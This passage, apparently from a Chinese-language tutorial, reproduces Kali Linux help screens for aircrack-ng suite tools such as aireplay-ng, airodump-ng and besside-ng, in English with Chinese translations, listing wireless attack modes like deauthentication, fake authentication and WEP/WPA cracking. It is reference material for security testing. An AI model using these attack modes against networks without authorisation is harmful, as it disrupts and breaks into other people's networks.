  12.       -s smac   : MAC address, Source  
  13.       -m len    : minimum packet length  
  14.       -n len    : maximum packet length  
  15.       -u type   : frame control, type    field  
  16.       -v subt   : frame control, subtype field  
  17.       -t tods   : frame control, To      DS bit  
  18.       -f fromds : frame control, From    DS bit  
  19.       -w iswep  : frame control, WEP     bit  
  20.       -D        : disable AP detection  
  21.   
  22.   Replay options:  
  23.   
  24.       -x nbpps  : number of packets per second  
  25.       -p fctrl  : set frame control word (hex)  
  26.       -a bssid  : set Access Point MAC address  
  27.       -c dmac   : set Destination  MAC address  
  28.       -h smac   : set Source       MAC address  
  29.       -g value  : change ring buffer size (default: 8)  
  30.       -F        : choose first matching packet  
  31.   
  32.       Fakeauth attack options:  
  33.   
  34.       -e essid  : set target AP SSID  
  35.       -o npckts : number of packets per burst (0=auto, default: 1)  
  36.       -q sec    : seconds between keep-alives  
  37.       -Q        : send reassociation requests  
  38.       -y prga   : keystream for shared key auth  
  39.       -T n      : exit after retry fake auth request n time  
  40.   
  41.       Arp Replay attack options:  
  42.   
  43.       -j        : inject FromDS packets  
  44.   
  45.       Fragmentation attack options:  
  46.   
  47.       -k IP     : set destination IP in fragments  
  48.       -l IP     : set source IP in fragments  
  49.   
  50.       Test attack options:  
  51.   
  52.       -B        : activates the bitrate test  
  53.   
  54.   Source options:  
  55.   
  56.       -i iface  : capture packets from this interface  
  57.       -r file   : extract packets from this pcap file  
  58.   
  59.   Miscellaneous options:  
  60.   
  61.       -R                    : disable /dev/rtc usage  
  62.       --ignore-negative-one : if the interface's channel can't be determined,  
  63.                               ignore the mismatch, needed for unpatched cfg80211  
  64.   
  65.   Attack modes (numbers can still be used):  
  66.   
  67.       --deauth      count : deauthenticate 1 or all stations (-0)  
  68.       --fakeauth    delay : fake authentication with AP (-1)  
  69.       --interactive       : interactive frame selection (-2)  
  70.       --arpreplay         : standard ARP-request replay (-3)  
  71.       --chopchop          : decrypt/chopchop WEP packet (-4)  
  72.       --fragment          : generates valid keystream   (-5)  
  73.       --caffe-latte       : query a client for new IVs  (-6)  
  74.       --cfrag             : fragments against a client  (-7)  
  75.       --migmode           : attacks WPA migration mode  (-8)  
  76.       --test              : tests injection and quality (-9)  
  77.   
  78.       --help              : Displays this usage screen  
root@kali:~# aireplay-ng --help

  Aireplay-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: aireplay-ng <options> <replay interface>

  Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Replay options:

      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -g value  : change ring buffer size (default: 8)
      -F        : choose first matching packet

      Fakeauth attack options:

      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec    : seconds between keep-alives
      -Q        : send reassociation requests
      -y prga   : keystream for shared key auth
      -T n      : exit after retry fake auth request n time

      Arp Replay attack options:

      -j        : inject FromDS packets

      Fragmentation attack options:

      -k IP     : set destination IP in fragments
      -l IP     : set source IP in fragments

      Test attack options:

      -B        : activates the bitrate test

  Source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

  Miscellaneous options:

      -R                    : disable /dev/rtc usage
      --ignore-negative-one : if the interface's channel can't be determined,
                              ignore the mismatch, needed for unpatched cfg80211

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen复制代码

中文对照版:

[html] view plain copy print?
  1. root@kali:~# aireplay-ng --help  
  2.   
  3.   Aireplay-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: aireplay-ng <options> <replay interface >  
  7.   
  8.   过滤选项:  
  9.   
  10.       -b bssid  : MAC地址,接入点  
  11.       -d dmac   : MAC地址,目的地址  
  12.       -s smac   : MAC地址,来源  
  13.       -m len    : 最小包长度  
  14.       -n len    : 最大包长度  
  15.       -u type   : 帧控制,类型字段  
  16.       -v subt   : 帧控制,子类型字段  
  17.       -t tods   : 帧控制,到DS位  
  18.       -f fromds : 帧控制,从DS位  
  19.       -w iswep  : 帧控制,WEP位  
  20.       -D        : 禁用AP检测  
  21.   
  22.   重播选项:  
  23.   
  24.       -x nbpps  : 每秒数据包数  
  25.       -p fctrl  : 设置帧控制字(十六进制)  
  26.       -a bssid  : 设置接入点MAC地址  
  27.       -c dmac   : 设置目的MAC地址  
  28.       -h smac   : 设置源MAC地址  
  29.       -g value  : 更改环缓冲区大小(默认值:8)  
  30.       -F        : 选择第一个匹配的数据包  
  31.   
  32.       Fakeauth攻击选项:  
  33.   
  34.       -e essid  : 设置目标AP SSID  
  35.       -o npckts : 每个突发数据包数 (0=auto, default: 1)  
  36.       -q sec    : 保持活力之间的秒数  
  37.       -Q        : 发送重新关联请求  
  38.       -y prga   : 共享密钥认证的密钥流  
  39.       -T n      : 在重试假验证请求后退出n次  
  40.   
  41.       Arp Replay攻击选项:  
  42.   
  43.       -j        : 注入FromDS数据包  
  44.   
  45.       碎片攻击选项:  
  46.   
  47.       -k IP     : 将目的IP设置为片段  
  48.       -l IP     : 将源IP设置为片段  
  49.   
  50.       测试攻击选项:  
  51.   
  52.       -B        : 激活比特率测试  
  53.   
  54.     源选项:  
  55.   
  56.       -i iface  : 从该接口捕获数据包  
  57.       -r file   : 从这个pcap文件中提取数据包  
  58.   
  59.   杂项选项:  
  60.   
  61.       -R                    : 禁用/ dev / rtc用法  
  62.       --ignore-negative-one : 如果界面的通道无法确定,请忽略未分配的cfg80211所需的不匹配  
  63.   
  64.   攻击模式(仍可使用数字):  
  65.   
  66.       --deauth      count : 取消认证1或所有电台      (-0)  
  67.       --fakeauth    delay : AP伪造认证               (-1)  
  68.       --interactive       : 互动框架选择       (-2)  
  69.       --arpreplay         : 标准ARP请求重放        (-3)  
  70.       --chopchop          : 解密/ chopchop WEP数据包 (-4)  
  71.       --fragment          : 有效的密钥流generates    (-5)  
  72.       --caffe-latte       : 查询客户端的新IV        (-6)  
  73.       --cfrag             : 对客户端的碎片          (-7)  
  74.       --migmode           : 攻击WPA迁移模式        (-8)  
  75.       --test              : 测试注射和质量          (-9)  
  76.   
  77.       --help              : 显示帮助  
root@kali:~# aireplay-ng --help

  Aireplay-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: aireplay-ng <options> <replay interface>

  过滤选项:

      -b bssid  : MAC地址,接入点
      -d dmac   : MAC地址,目的地址
      -s smac   : MAC地址,来源
      -m len    : 最小包长度
      -n len    : 最大包长度
      -u type   : 帧控制,类型字段
      -v subt   : 帧控制,子类型字段
      -t tods   : 帧控制,到DS位
      -f fromds : 帧控制,从DS位
      -w iswep  : 帧控制,WEP位
      -D        : 禁用AP检测

  重播选项:

      -x nbpps  : 每秒数据包数
      -p fctrl  : 设置帧控制字(十六进制)
      -a bssid  : 设置接入点MAC地址
      -c dmac   : 设置目的MAC地址
      -h smac   : 设置源MAC地址
      -g value  : 更改环缓冲区大小(默认值:8)
      -F        : 选择第一个匹配的数据包

      Fakeauth攻击选项:

      -e essid  : 设置目标AP SSID
      -o npckts : 每个突发数据包数 (0=auto, default: 1)
      -q sec    : 保持活力之间的秒数
      -Q        : 发送重新关联请求
      -y prga   : 共享密钥认证的密钥流
      -T n      : 在重试假验证请求后退出n次

      Arp Replay攻击选项:

      -j        : 注入FromDS数据包

      碎片攻击选项:

      -k IP     : 将目的IP设置为片段
      -l IP     : 将源IP设置为片段

      测试攻击选项:

      -B        : 激活比特率测试

    源选项:

      -i iface  : 从该接口捕获数据包
      -r file   : 从这个pcap文件中提取数据包

  杂项选项:

      -R                    : 禁用/ dev / rtc用法
      --ignore-negative-one : 如果界面的通道无法确定,请忽略未分配的cfg80211所需的不匹配

  攻击模式(仍可使用数字):

      --deauth      count : 取消认证1或所有电台      (-0)
      --fakeauth    delay : AP伪造认证	             (-1)
      --interactive       : 互动框架选择 	     (-2)
      --arpreplay         : 标准ARP请求重放 	     (-3)
      --chopchop          : 解密/ chopchop WEP数据包 (-4)
      --fragment          : 有效的密钥流generates    (-5)
      --caffe-latte       : 查询客户端的新IV  	     (-6)
      --cfrag             : 对客户端的碎片  	     (-7)
      --migmode           : 攻击WPA迁移模式  	     (-8)
      --test              : 测试注射和质量 	     (-9)

      --help              : 显示帮助复制代码


7、airmon-ng – 该脚本可用于在无线接口上启用监视器模式

[html] view plain copy print?
  1. root@kali:~# airmon-ng --help  
  2.   
  3.   
  4. usage: airmon-ng <start|stop|check> <interface > [channel or frequency]  
root@kali:~# airmon-ng --help


usage: airmon-ng <start|stop|check> <interface> [channel or frequency]复制代码

8、airmon-zc – 该脚本可用于在无线接口上启用监视器模式

[html] view plain copy print?
  1. root@kali:~# airmon-zc --help  
  2.   
  3. usage: airmon-zc <start|stop|check> <interface > [channel or frequency]  
root@kali:~# airmon-zc --help

usage: airmon-zc <start|stop|check> <interface> [channel or frequency]复制代码

9、airodump-ng – 用于原始802.11帧的数据包捕获

[html] view plain copy print?
  1. root@kali:~# airodump-ng --help  
  2.   
  3.   Airodump-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: airodump-ng <options> <interface >[,<interface>,...]  
  7.   
  8.   Options:  
  9.       --ivs                 : Save only captured IVs  
  10.       --gpsd                : Use GPSd  
  11.       --write      <prefix> : Dump file prefix  
  12.       -w                    : same as --write  
  13.       --beacons             : Record all beacons in dump file  
  14.       --update       <secs> : Display update delay in seconds  
  15.       --showack             : Prints ack/cts/rts statistics  
  16.       -h                    : Hides known stations for --showack  
  17.       -f            <msecs> : Time in ms between hopping channels  
  18.       --berlin       <secs> : Time before removing the AP/client  
  19.                               from the screen when no more packets  
  20.                               are received (Default: 120 seconds)  
  21.       -r             <file > : Read packets from that file  
  22.       -x            <msecs > : Active Scanning Simulation  
  23.       --manufacturer        : Display manufacturer from IEEE OUI list  
  24.       --uptime              : Display AP Uptime from Beacon Timestamp  
  25.       --output-format  
  26.                   <formats > : Output format. Possible values:  
  27.                               pcap, ivs, csv, gps, kismet, netxml  
  28.       --ignore-negative-one : Removes the message that says  
  29.                               fixed channel < interface>: -1  
  30.   
  31.   Filter options:  
  32.       --encrypt   <suite>   : Filter APs by cipher suite  
  33.       --netmask <netmask>   : Filter APs by mask  
  34.       --bssid     <bssid>   : Filter APs by BSSID  
  35.       --essid     <essid>   : Filter APs by ESSID  
  36.       -a                    : Filter unassociated clients  
  37.   
  38.   By default, airodump-ng hop on 2.4GHz channels.  
  39.   You can make it capture on other/specific channel(s) by using:  
  40.       --channel <channels>  : Capture on specific channels  
  41.       --band <abg>          : Band on which airodump-ng should hop  
  42.       -C    <frequencies>   : Uses these frequencies in MHz to hop  
  43.       --cswitch  <method>   : Set channel switching method  
  44.                     0       : FIFO (default)  
  45.                     1       : Round Robin  
  46.                     2       : Hop on last  
  47.       -s                    : same as --cswitch  
  48.   
  49.       --help                : Displays this usage screen  
root@kali:~# airodump-ng --help

  Airodump-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: airodump-ng <options> <interface>[,<interface>,...]

  Options:
      --ivs                 : Save only captured IVs
      --gpsd                : Use GPSd
      --write      <prefix> : Dump file prefix
      -w                    : same as --write
      --beacons             : Record all beacons in dump file
      --update       <secs> : Display update delay in seconds
      --showack             : Prints ack/cts/rts statistics
      -h                    : Hides known stations for --showack
      -f            <msecs> : Time in ms between hopping channels
      --berlin       <secs> : Time before removing the AP/client
                              from the screen when no more packets
                              are received (Default: 120 seconds)
      -r             <file> : Read packets from that file
      -x            <msecs> : Active Scanning Simulation
      --manufacturer        : Display manufacturer from IEEE OUI list
      --uptime              : Display AP Uptime from Beacon Timestamp
      --output-format
                  <formats> : Output format. Possible values:
                              pcap, ivs, csv, gps, kismet, netxml
      --ignore-negative-one : Removes the message that says
                              fixed channel <interface>: -1

  Filter options:
      --encrypt   <suite>   : Filter APs by cipher suite
      --netmask <netmask>   : Filter APs by mask
      --bssid     <bssid>   : Filter APs by BSSID
      --essid     <essid>   : Filter APs by ESSID
      -a                    : Filter unassociated clients

  By default, airodump-ng hop on 2.4GHz channels.
  You can make it capture on other/specific channel(s) by using:
      --channel <channels>  : Capture on specific channels
      --band <abg>          : Band on which airodump-ng should hop
      -C    <frequencies>   : Uses these frequencies in MHz to hop
      --cswitch  <method>   : Set channel switching method
                    0       : FIFO (default)
                    1       : Round Robin
                    2       : Hop on last
      -s                    : same as --cswitch

      --help                : Displays this usage screen复制代码

中文对照版:

[html] view plain copy print?
  1. root@kali:~# airodump-ng --help  
  2.   
  3.   Airodump-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: airodump-ng <options> <interface >[,<interface>,...]  
  7.   
  8.   选项:  
  9.       --ivs                 : 只保存捕获的IV  
  10.       --gpsd                : 使用GPSd  
  11.       --write      <prefix> : 转储文件前缀  
  12.       -w                    : same as --write  
  13.       --beacons             : 在转储文件中记录所有信标  
  14.       --update       <secs> : 以秒为单位显示更新延迟  
  15.       --showack             : 打印ack / cts / rts统计  
  16.       -h                    : 隐藏已知的站点--showack  
  17.       -f            <msecs> : 跳频通道之间的时间(毫秒)  
  18.       --berlin       <secs> : 在没有收到更多数据包的情况下,从屏幕上删除AP /客户端之前的时间(默认值:120秒)  
  19.       -r             <file> : 从该文件读取数据包  
  20.       -x            <msecs> : 主动扫描模拟  
  21.       --manufacturer        : 显示器制造商从IEEE OUI列表  
  22.       --uptime              : 从信标时间戳显示AP正常运行时间  
  23.       --output-format  
  24.                   <formats> : 输出格式.可能的值:pcap,ivs,csv,gps,kismet,netxml  
  25.       --ignore-negative-one : 删除固定通道<interface>:-1的消息  
  26.   
  27.   Filter options:  
  28.       --encrypt   <suite>   : 通过加密套件过滤AP  
  29.       --netmask <netmask>   : 通过掩码过滤AP  
  30.       --bssid     <bssid>   : 通过BSSID过滤AP  
  31.       --essid     <essid>   : 通过ESSID过滤AP  
  32.       -a                    : 过滤未关联的客户端  
  33.   
  34.   默认情况下,airodump-ng在2.4GHz频道上跳。  
  35.    您可以使用以下方式在其他/特定频道上进行捕获:  
  36.       --channel <channels>  : 在特定频道上捕获  
  37.       --band <abg>          : Band on which airodump-ng should hop  
  38.       -C    <frequencies>   : 以MHz为单位使用这些频率  
  39.       --cswitch  <method>   : 设置通道切换方式  
  40.                     0       : FIFO (default)  
  41.                     1       : Round Robin 轮回  
  42.                     2       : Hop on last 最后跳  
  43.       -s                    : same as --cswitch  
  44.   
  45.       --help                : 显示帮助  
root@kali:~# airodump-ng --help

  Airodump-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: airodump-ng <options> <interface>[,<interface>,...]

  选项:
      --ivs                 : 只保存捕获的IV
      --gpsd                : 使用GPSd
      --write      <prefix> : 转储文件前缀
      -w                    : same as --write
      --beacons             : 在转储文件中记录所有信标
      --update       <secs> : 以秒为单位显示更新延迟
      --showack             : 打印ack / cts / rts统计
      -h                    : 隐藏已知的站点--showack
      -f            <msecs> : 跳频通道之间的时间(毫秒)
      --berlin       <secs> : 在没有收到更多数据包的情况下,从屏幕上删除AP /客户端之前的时间(默认值:120秒)
      -r             <file> : 从该文件读取数据包
      -x            <msecs> : 主动扫描模拟
      --manufacturer        : 显示器制造商从IEEE OUI列表
      --uptime              : 从信标时间戳显示AP正常运行时间
      --output-format
                  <formats> : 输出格式.可能的值:pcap,ivs,csv,gps,kismet,netxml
      --ignore-negative-one : 删除固定通道<interface>:-1的消息

  Filter options:
      --encrypt   <suite>   : 通过加密套件过滤AP
      --netmask <netmask>   : 通过掩码过滤AP
      --bssid     <bssid>   : 通过BSSID过滤AP
      --essid     <essid>   : 通过ESSID过滤AP
      -a                    : 过滤未关联的客户端

  默认情况下,airodump-ng在2.4GHz频道上跳。
   您可以使用以下方式在其他/特定频道上进行捕获:
      --channel <channels>  : 在特定频道上捕获
      --band <abg>          : Band on which airodump-ng should hop
      -C    <frequencies>   : 以MHz为单位使用这些频率
      --cswitch  <method>   : 设置通道切换方式
                    0       : FIFO (default)
                    1       : Round Robin 轮回
                    2       : Hop on last 最后跳
      -s                    : same as --cswitch

      --help                : 显示帮助复制代码



10、airodump-ng-oui-update – 下载并解析IEEE OUI列表


11、airolib-ng – 专门用于存储和管理essid和密码列表

[html] view plain copy print ?
  1. root@kali:~# airolib-ng --help  
  2.   
  3.   Airolib-ng 1.2 beta3 - (C) 2007, 2008, 2009 ebfe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   Usage: airolib-ng <database> <operation > [options]  
  7.   
  8.   Operations:  
  9.   
  10.        --stats        : Output information about the database.  
  11.        --sql <sql>    : Execute specified SQL statement.  
  12.        --clean [all]  : Clean the database from old junk. 'all' will also  
  13.                         reduce filesize if possible and run an integrity check.  
  14.        --batch        : Start batch-processing all combinations of ESSIDs  
  15.                         and passwords.  
  16.        --verify [all] : Verify a set of randomly chosen PMKs.  
  17.                         If 'all' is given, all invalid PMK will be deleted.  
  18.   
  19.        --import [essid|passwd] <file>   :  
  20.                         Import a text file as a list of ESSIDs or passwords.  
  21.        --import cowpatty <file>         :  
  22.                         Import a cowpatty file.  
  23.   
  24.        --export cowpatty <essid>  <file> :  
  25.                         Export to a cowpatty file.  
root@kali:~# airolib-ng --help

  Airolib-ng 1.2 beta3 - (C) 2007, 2008, 2009 ebfe
  http://www.aircrack-ng.org

  Usage: airolib-ng <database> <operation> [options]

  Operations:

       --stats        : Output information about the database.
       --sql <sql>    : Execute specified SQL statement.
       --clean [all]  : Clean the database from old junk. 'all' will also
                        reduce filesize if possible and run an integrity check.
       --batch        : Start batch-processing all combinations of ESSIDs
                        and passwords.
       --verify [all] : Verify a set of randomly chosen PMKs.
                        If 'all' is given, all invalid PMK will be deleted.

       --import [essid|passwd] <file>   :
                        Import a text file as a list of ESSIDs or passwords.
       --import cowpatty <file>         :
                        Import a cowpatty file.

       --export cowpatty <essid> <file> :
                        Export to a cowpatty file.复制代码

中文对照版: [html] view plain copy print?
  1. root@kali:~# airolib-ng --help  
  2.   
  3.   Airolib-ng 1.2 beta3 - (C) 2007, 2008, 2009 ebfe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   Usage: airolib-ng <database> <operation > [options]  
  7.   
  8.   Operations:  
  9.   
  10.        --stats        : 输出有关数据库的信息  
  11.        --sql <sql>    : 执行指定的SQL语句  
  12.        --clean [all]  : 从旧垃圾清理数据库.如果可能,'all' 也将减少文件大小,并执行完整性检查  
  13.        --batch        : 开始批处理所有ESSID和密码的组合  
  14.        --verify [all] : 验证一组随机选择的PMK.如果给出“全部”,则所有无效的PMK将被删除  
  15.   
  16.        --import [essid|passwd] <file>   :  
  17.                         导入文本文件作为ESSID或密码列表  
  18.        --import cowpatty <file>         :  
  19.                         导入cowpatty文件  
  20.   
  21.        --export cowpatty <essid> < file> :  
  22.                         导出到一个cowpatty文件  
root@kali:~# airolib-ng --help

  Airolib-ng 1.2 beta3 - (C) 2007, 2008, 2009 ebfe
  http://www.aircrack-ng.org

  Usage: airolib-ng <database> <operation> [options]

  Operations:

       --stats        : 输出有关数据库的信息
       --sql <sql>    : 执行指定的SQL语句
       --clean [all]  : 从旧垃圾清理数据库.如果可能,'all' 也将减少文件大小,并执行完整性检查
       --batch        : 开始批处理所有ESSID和密码的组合
       --verify [all] : 验证一组随机选择的PMK.如果给出“全部”,则所有无效的PMK将被删除

       --import [essid|passwd] <file>   :
                        导入文本文件作为ESSID或密码列表
       --import cowpatty <file>         :
                        导入cowpatty文件

       --export cowpatty <essid> <file> :
                        导出到一个cowpatty文件复制代码
12、airserv-ng – 无线网卡服务器 [html] view plain copy print ?
  1. root@kali:~# airserv-ng --help  
  2. airserv-ng: invalid option -- '-'  
  3.   
  4.   Airserv-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau  
  5.   http://www.aircrack-ng.org  
  6.   
  7.   Usage: airserv-ng <options>  
  8.   
  9.   Options:  
  10.   
  11.        -h         : This help screen  
  12.        -p  <port> : TCP port to listen on (default:666)  
  13.        -d <iface> : Wifi interface to use  
  14.        -c  <chan> : Channel to use  
  15.        -v <level> : Debug level (1 to 3; default: 1)  
root@kali:~# airserv-ng --help
airserv-ng: invalid option -- '-'

  Airserv-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
  http://www.aircrack-ng.org

  Usage: airserv-ng <options>

  Options:

       -h         : This help screen
       -p  <port> : TCP port to listen on (default:666)
       -d <iface> : Wifi interface to use
       -c  <chan> : Channel to use
       -v <level> : Debug level (1 to 3; default: 1)复制代码

中文对照版: [html] view plain copy print ?
  1. root@kali:~# airserv-ng --help  
  2. airserv-ng: invalid option -- '-'  
  3.   
  4.   Airserv-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau  
  5.   http://www.aircrack-ng.org  
  6.   
  7.   Usage: airserv-ng <options>  
  8.   
  9.   选项:  
  10.   
  11.        -h         : 这个帮助屏幕  
  12.        -p  <port> : TCP端口监听(默认值:666)  
  13.        -d <iface> : Wifi界面使用  
  14.        -c  <chan> : 频道使用  
  15.        -v <level> : 调试级别 (1 to 3; default: 1)  
root@kali:~# airserv-ng --help
airserv-ng: invalid option -- '-'

  Airserv-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
  http://www.aircrack-ng.org

  Usage: airserv-ng <options>

  选项:

       -h         : 这个帮助屏幕
       -p  <port> : TCP端口监听(默认值:666)
       -d <iface> : Wifi界面使用
       -c  <chan> : 频道使用
       -v <level> : 调试级别 (1 to 3; default: 1)复制代码
13、airtun-ng – 虚拟隧道接口创建者

[html] view plain copy print ?
  1. root@kali:~# airtun-ng --help  
  2.   
  3.   Airtun-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   Original work: Martin Beck  
  5.   http://www.aircrack-ng.org  
  6.   
  7.   usage: airtun-ng <options> <replay interface >  
  8.   
  9.       -x nbpps         : number of packets per second (default: 100)  
  10.       -a bssid         : set Access Point MAC address  
  11.                        : In WDS Mode this sets the Receiver  
  12.       -i iface         : capture packets from this interface  
  13.       -y file          : read PRGA from this file  
  14.       -w wepkey        : use this WEP-KEY to encrypt packets  
  15.       -t tods          : send frames to AP (1) or to client (0)  
  16.                        : or tunnel them into a WDS/Bridge (2)  
  17.       -r file          : read frames out of pcap file  
  18.   
  19.   WDS/Bridge Mode options:  
  20.       -s transmitter   : set Transmitter MAC address for WDS Mode  
  21.       -b               : bidirectional mode. This enables communication  
  22.                        : in Transmitter's AND Receiver's networks.  
  23.                        : Works only if you can see both stations.  
  24.   
  25.   Repeater options:  
  26.       --repeat         : activates repeat mode  
  27.       --bssid <mac>    : BSSID to repeat  
  28.       --netmask <mask> : netmask for BSSID filter  
  29.   
  30.       --help           : Displays this usage screen  
root@kali:~# airtun-ng --help

  Airtun-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  Original work: Martin Beck
  http://www.aircrack-ng.org

  usage: airtun-ng <options> <replay interface>

      -x nbpps         : number of packets per second (default: 100)
      -a bssid         : set Access Point MAC address
                       : In WDS Mode this sets the Receiver
      -i iface         : capture packets from this interface
      -y file          : read PRGA from this file
      -w wepkey        : use this WEP-KEY to encrypt packets
      -t tods          : send frames to AP (1) or to client (0)
                       : or tunnel them into a WDS/Bridge (2)
      -r file          : read frames out of pcap file

  WDS/Bridge Mode options:
      -s transmitter   : set Transmitter MAC address for WDS Mode
      -b               : bidirectional mode. This enables communication
                       : in Transmitter's AND Receiver's networks.
                       : Works only if you can see both stations.

  Repeater options:
      --repeat         : activates repeat mode
      --bssid <mac>    : BSSID to repeat
      --netmask <mask> : netmask for BSSID filter

      --help           : Displays this usage screen复制代码

中文对照版:

[html] view plain copy print ?
  1. root@kali:~# airtun-ng --help  
  2.   
  3.   Airtun-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   Original work: Martin Beck  
  5.   http://www.aircrack-ng.org  
  6.   
  7.   usage: airtun-ng <options> <replay interface >  
  8.   
  9.       -x nbpps         : 每秒数据包数 (default: 100)  
  10.       -a bssid         : 设置接入点MAC地址  
  11.                        : 在WDS模式下,这将设置接收器  
  12.       -i iface         : 从该接口捕获数据包  
  13.       -y file          : 从这个文件读取PRGA  
  14.       -w wepkey        : 使用此WEP-KEY加密数据包  
  15.       -t tods          : 向AP(1)或客户端(0)发送帧  
  16.                        : 或将其隧道引入 WDS / Bridge(2)  
  17.       -r file          : 从pcap文件读取帧  
  18.   
  19.   WDS / Bridge模式选项:  
  20.       -s transmitter   : 设置WDS模式的发送器MAC地址  
  21.       -b               : 双向模式,这使得能够进行通信  
  22.                        : 在发射机和接收机的网络中  
  23.                        : 只有当你能看到这两个电台时,才能工作  
  24.   
  25.   中继器选项:  
  26.       --repeat         : 激活重复模式  
  27.       --bssid <mac>    : BSSID重复  
  28.       --netmask <mask> : 用于BSSID过滤器的网络掩码  
  29.   
  30.       --help           : 显示帮助  
root@kali:~# airtun-ng --help

  Airtun-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  Original work: Martin Beck
  http://www.aircrack-ng.org

  usage: airtun-ng <options> <replay interface>

      -x nbpps         : 每秒数据包数 (default: 100)
      -a bssid         : 设置接入点MAC地址
                       : 在WDS模式下,这将设置接收器
      -i iface         : 从该接口捕获数据包
      -y file          : 从这个文件读取PRGA
      -w wepkey        : 使用此WEP-KEY加密数据包
      -t tods          : 向AP(1)或客户端(0)发送帧
                       : 或将其隧道引入 WDS / Bridge(2)
      -r file          : 从pcap文件读取帧

  WDS / Bridge模式选项:
      -s transmitter   : 设置WDS模式的发送器MAC地址
      -b               : 双向模式,这使得能够进行通信
                       : 在发射机和接收机的网络中
                       : 只有当你能看到这两个电台时,才能工作

  中继器选项:
      --repeat         : 激活重复模式
      --bssid <mac>    : BSSID重复
      --netmask <mask> : 用于BSSID过滤器的网络掩码

      --help           : 显示帮助复制代码

14、besside-ng – 自动破解WEP和WPA网络

[html] view plain copy print?
  1. root@kali:~# besside-ng --help  
  2. besside-ng: invalid option -- '-'  
  3.   
  4.   Besside-ng 1.2 beta3 - (C) 2010 Andrea Bittau  
  5.   http://www.aircrack-ng.org  
  6.   
  7.   Usage: besside-ng [options] <interface>  
  8.   
  9.   Options:  
  10.   
  11.        -b <victim mac> : Victim BSSID  
  12.        -s <WPA server> : Upload wpa.cap for cracking  
  13.        -c       <chan> : chanlock  
  14.        -p       <pps>  : flood rate  
  15.        -W              : WPA only  
  16.        -v              : verbose, -vv for more, etc.  
  17.        -h              : This help screen  
root@kali:~# besside-ng --help
besside-ng: invalid option -- '-'

  Besside-ng 1.2 beta3 - (C) 2010 Andrea Bittau
  http://www.aircrack-ng.org

  Usage: besside-ng [options] <interface>

  Options:

       -b <victim mac> : Victim BSSID
       -s <WPA server> : Upload wpa.cap for cracking
       -c       <chan> : chanlock
       -p       <pps>  : flood rate
       -W              : WPA only
       -v              : verbose, -vv for more, etc.
       -h              : This help screen复制代码

中文对照版:

[html] view plain copy print?
  1. root@kali:~# besside-ng --help  
  2. besside-ng: invalid option -- '-'  
  3.   
  4.   Besside-ng 1.2 beta3 - (C) 2010 Andrea Bittau  
  5.   http://www.aircrack-ng.org  
  6.   
  7.   Usage: besside-ng [options] <interface>  
  8.   
  9.   选项:  
  10.   
  11.        -b <victim mac> : 受害者BSSID  
  12.        -s <WPA server> : 上传wpa.cap破解  
  13.        -c       <chan> : chanlock  
  14.        -p       <pps>  : flood rate  
  15.        -W              : WPA only  
  16.        -v              : 详细的, -vv for more, etc.  
  17.        -h              : 显示帮助  
root@kali:~# besside-ng --help
besside-ng: invalid option -- '-'

  Besside-ng 1.2 beta3 - (C) 2010 Andrea Bittau
  http://www.aircrack-ng.org

  Usage: besside-ng [options] <interface>

  选项:

       -b <victim mac> : 受害者BSSID
       -s <WPA server> : 上传wpa.cap破解
       -c       <chan> : chanlock
       -p       <pps>  : flood rate
       -W              : WPA only
       -v              : 详细的, -vv for more, etc.
       -h              : 显示帮助复制代码
15、buddy-ng

[html] view plain copy print?
  1. root@kali:~# buddy-ng -h  
  2.   
  3.   Buddy-ng 1.2 beta3 - (C) 2007,2008 Andrea Bittau  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   Usage: buddy-ng <options>  
  7.   
  8.   Options:  
  9.   
  10.        -h        : This help screen  
  11.        -p        : Don't drop privileges  
root@kali:~# buddy-ng -h

  Buddy-ng 1.2 beta3 - (C) 2007,2008 Andrea Bittau
  http://www.aircrack-ng.org

  Usage: buddy-ng <options>

  Options:

       -h        : This help screen
       -p        : Don't drop privileges复制代码

中文对照版:

[html] view plain copy print ?
  1. root@kali:~# buddy-ng -h  
  2.   
  3.   Buddy-ng 1.2 beta3 - (C) 2007,2008 Andrea Bittau  
